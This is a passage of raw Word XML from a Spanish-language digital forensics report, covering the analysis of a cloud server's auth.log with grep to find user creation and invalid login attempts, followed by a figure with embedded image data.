                        </w:r>
                        <w:bookmarkStart w:id="125" w:name="_Toc155782616"/>
                        <w:r w:rsidRPr="00EA494C">
                          <w:t>Comprobación usuarios del sistema.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="125"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CDDCBC" w14:textId="6B18F90E" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00454796">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc155782518"/>
      <w:r w:rsidRPr="00A703AB">
        <w:t>4.4. Análisis de evidencias del disco duro.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="5C94DC6E" w14:textId="6DC2CBC3" w:rsidR="00381329" w:rsidRDefault="00381329" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E4102F" w14:textId="5A8FD5A4" w:rsidR="00857943" w:rsidRDefault="00A703AB" w:rsidP="00062086">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00857943">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00062086">
        <w:t>uth.log</w:t>
      </w:r>
      <w:r w:rsidR="00857943">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F4AA8" w14:textId="18EC34F1" w:rsidR="00D87C09" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No contentos con este análisis puesto que no sacamos nada nuevo, vamos a observar en los registros del sistema que autenticaciones han ocurrido en el cloud server, para ello procederemos a extraer </w:t>
      </w:r>
      <w:r w:rsidRPr="00927E54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log/auth.log</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, con ello veremos un registro completo de las acciones llevadas a cabo dentro del cloud server. Procedemos con WSL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>WSL (Windows Subsystem for Linux): Capa de compatibilidad para ejecutar binarios de Linux de forma nativa en Windows.</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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a realizar un primer análisis haciendo un </w:t>
      </w:r>
      <w:r w:rsidRPr="00927E54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>grep "user" auth.log</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, el cual nos da muchísima información. Se adjunta pantallazo </w:t>
      </w:r>
      <w:r w:rsidR="00927E54" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de este</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF0557">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Por otro lado, investigando en la carpeta </w:t>
      </w:r>
      <w:r w:rsidR="00AF0557" w:rsidRPr="00EA5045">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log</w:t>
      </w:r>
      <w:r w:rsidR="00AF0557">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, encontramos, en </w:t>
      </w:r>
      <w:r w:rsidR="002A0185">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>el archivo</w:t>
      </w:r>
      <w:r w:rsidR="00EA5045">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF0557" w:rsidRPr="00EA5045">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log/auth.log.2.gz</w:t>
      </w:r>
      <w:r w:rsidR="00AF0557">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se</w:t>
      </w:r>
      <w:r w:rsidR="00EA5045">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede observar que se añade el usuario </w:t>
      </w:r>
      <w:r w:rsidR="00AF0557" w:rsidRPr="00AF0557">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00EA5045">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r w:rsidR="00EA5045" w:rsidRPr="00AF0557">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>UID 1000</w:t>
      </w:r>
      <w:r w:rsidR="00EA5045">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, la fecha de este registro es el </w:t>
      </w:r>
      <w:bookmarkStart w:id="127" w:name="_Hlk155295758"/>
      <w:r w:rsidR="00EA5045" w:rsidRPr="00AF0557">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>21 de diciembre a las 12:04:49</w:t>
      </w:r>
      <w:r w:rsidR="00753234" w:rsidRPr="00AF0557">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> UTC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
      <w:r w:rsidR="00EA5045">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Con este dato se</w:t>
      </w:r>
      <w:r w:rsidR="00CD1106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede deducir que la instalación del sistema operativo</w:t>
      </w:r>
      <w:r w:rsidR="00753234">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es en ese momento, ya que una de las acciones de la instalación del sistema operativo es la creación de este </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>usuario.</w:t>
      </w:r>
      <w:r w:rsidR="00373996" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Al</w:t>
      </w:r>
      <w:r w:rsidR="00D87C09" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ver tal cantidad ingente de información procedemos a ver un patrón de usuarios inválidos en auth.log. Por lo que buscamos los </w:t>
      </w:r>
      <w:r w:rsidR="00D87C09" w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>invalid user</w:t>
      </w:r>
      <w:r w:rsidR="00D87C09" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el comando </w:t>
      </w:r>
      <w:r w:rsidR="00D87C09" w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>grep "Invalid user" auth.log</w:t>
      </w:r>
      <w:r w:rsidR="00D87C09">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519CC54" w14:textId="29B0FEE2" w:rsidR="00A703AB" w:rsidRPr="000E1874" w:rsidRDefault="000E1874" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155751372 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XX.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C5369" w14:textId="565494B3" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="009A067C" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251800576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05D96D80" wp14:editId="087CAE2A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-314591</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>13970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6079490" cy="2037715"/>
                <wp:effectExtent l="0" t="0" r="0" b="635"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="457396872" name="Grupo 44"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6079490" cy="2037715"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6079490" cy="2037715"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1386328194" name="Grupo 115"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6079490" cy="1726565"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="6079613" cy="1726565"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="344914615" name="Imagen 85" descr="Texto&#10;&#10;Descripción generada automáticamente con confianza media"/>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219450" cy="1726565"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1907396949" name="Imagen 110" descr="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente"/>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3302758" y="0"/>
                              <a:ext cx="2776855" cy="1725295"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="1510405736" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318977" y="1753870"/>
                            <a:ext cx="5757545" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5E6E4F50" w14:textId="5D8DA441" w:rsidR="00756E4A" w:rsidRPr="006D7C69" w:rsidRDefault="00756E4A" w:rsidP="00756E4A">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>50</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="128" w:name="_Toc155782617"/>
                              <w:r w:rsidRPr="00577A27">
                                <w:t>Comando grep “user” auth.log y prueba de instalación del Sistema Operativo.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D96D80" id="Grupo 44" o:spid="_x0000_s1189" style="position:absolute;left:0;text-align:left;margin-left:-24.75pt;margin-top:1.1pt;width:478.7pt;height:160.45pt;z-index:251800576" coordsize="60794,20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&#10;AwMDAwMHG//m1FNPnU455ZRpx44dXSV14P4Hp+aTTz55CX4ZBxtkYGBgYGBgYGBgYGvj3/QU04GB&#10;gYGBgYGBgYGBrYVhGAwMDAwMDAwMDAwMDMNgYGBgYGBgYGBgYGAYBgMDAwMDAwMDAwMDC3QNg52/&#10;tv7eKhxyVv/+wAwOOXQ6+bof6T8r2HnC5evunfGYD02HHnb0uvtLHLJtke+b+s8OEA47+pzu/T1Y&#10;0LDzuIuX5ydc9QPT9iNOXZ9mi8F/PnL+lKc8Za9nFf5o/V3f9V3dZwMDAwMDAwMDBxv9FYMjO/dW&#10;YNuj19/b9QePmLZ/30KRfNfiesdCyf2lxfWzF+fHPGI69LbF/dcu0vzhvWl//TvvwWE/sUj/qbXz&#10;nT/7iGnHWxdpPrcwQE5aOz/882tHdO78lcWzDyyeXb932ppfsONnFmk+vDg/dXH+tgU9Ly40/N7i&#10;3jsX317gkBMX5+9f3Fuk3/b4BZ6wSPvKe+mX9jOL8xespd32jEX68xf3D1lcv3qBtyyef3Tx/tsX&#10;989bS9/i4u/9q0X67d1nFZd+/z+uu3f5S//zuntB8j3nyb+zePfb07lP+4Pp8JOvm654+f87nfvU&#10;31visKPOmi55wd9Ml7/kn6eTdr+um88qnPX4X+veDw7ZtnM69sJnr50fetjieMhez+Hoo4+efvmX&#10;f3l617veNV199dXrnh9IvOhFL5o+/vGPd5/tCz7ykY9MX//617vPNsKb3/zmPefyqc8qDjvssOmT&#10;n/xk99nAwMDAwMDAwMHGOsPg0KseMR3xtbXzQy5fU7y3PX9x/7ELhfeTi/NnLZTe9yyen7NQZF61&#10;OH/j4t7CMNi5UO633bxI88dr7+74yYXy/JIFFu8+Yufi+ccX9356cX78QrH/7OL6zgV+eS1taxjs&#10;/IXFvd+893yh7Dtup4BfsnZOiXdkXET5ptTvlXb3gp4nfwePOHZNaYdHHLe4d8fi/AcLDQtDhvGy&#10;7emLdxeGwbZnLnDDIq+FcUP5Zygc9qZ7v/W+xf2XLvC8xfXCOFny58bFe1fc+/xH1+47h5/8yZ/c&#10;c37ojmMWCvxfLs+vfu3/bzr/mV+Yzn36Z5bXl7/i/zuduPv1y3u7Trxquuwl/3k6+uzHT9sOP3n5&#10;/PjLXzoddvS5a2lf9l+mE6561XTOU35nT74XPX8tXzj3yb89bdt53PL8soWRcOQZt03bdp20NAwu&#10;et43pgue9cWlYXD8pS+Yjr/sxUtIe+mL/3k6+tynTuc/40+W6aU74cpXLmk46szHTud99x8vaVrm&#10;u6Bv++GnTGc/8c5p10nXTqc/6v3TOU/66NIw2Hn8pdMZt//Mgt6zl2kvXxgnJ133pum87/rMdOSR&#10;R06/9Eu/1P0L9vbt26ePfexj0xOe8ITpF3/xF6fjjjtu+tSnPjXddNNN04c+9KHpfe973/SYxzxm&#10;jwL9h3/4h9P111+/fKfNC573vOdN733ve5fn3pHfG9/4xuXxZ3/2Z6enPe1p01FHHTX91E/91PTo&#10;Rz96mWbbtm3L61e/+tXT7/zOGn/R4vs17wA9r3/966dHPepR0xlnnLHM5xnPeMZ00UUXTVdeeeUy&#10;r6uuumqZFr3K8v73v39dPlANA2nRz4CS1yte8YrpJ37iJ5bfqe8MDAwMDAwMDBwIdFcMYhjAcmb+&#10;3vNdv3rv8SMLBe6531HKGQZm8fPsEYctlOxfXBwXCvbO31i7/4htC2xfvPfKRdo/XVPIGQ7Ld6ph&#10;sFCod3xwoYT/+CL/qxfpFsr+4Z9b3Pup76TZYxgs8tpjGLyjSXvIApTze3HICQvl+ZbF+YK27a9Y&#10;5PHbi3MrA1Y05ImGxTs7F2VcGgZPWeT1Z4t7hy6wYy3N9tcsjsr2ocVR2e6lm0GRlYclLY1hUHHG&#10;7R9c5Ln2zwiGwTkLBZ5C7frSF35rebzwe+5au25WDC578bf3nMe4CM549M/vyReqYSAfirotSAyD&#10;Yy569nTozuOXhoE02xbnIO0lL/y76fRb3zudfJ1Z7kOnM2776emKV/y36fBTblg+rysG1TA47ZHv&#10;WBozdcXghCtetscwuPh7/3p5vPRF/7A8Hn744dNLX/rS6bbbblteB/6p8QM/8APLc8q44+c///k9&#10;z7/0pS9N3//937+E68zAf+Yza8bVKlTDwL8iKNqf/exnlwbKl7/85b3y/bEf+7F17/dglv93f/d3&#10;p/e85z3TD//wD68zDKTprRikbC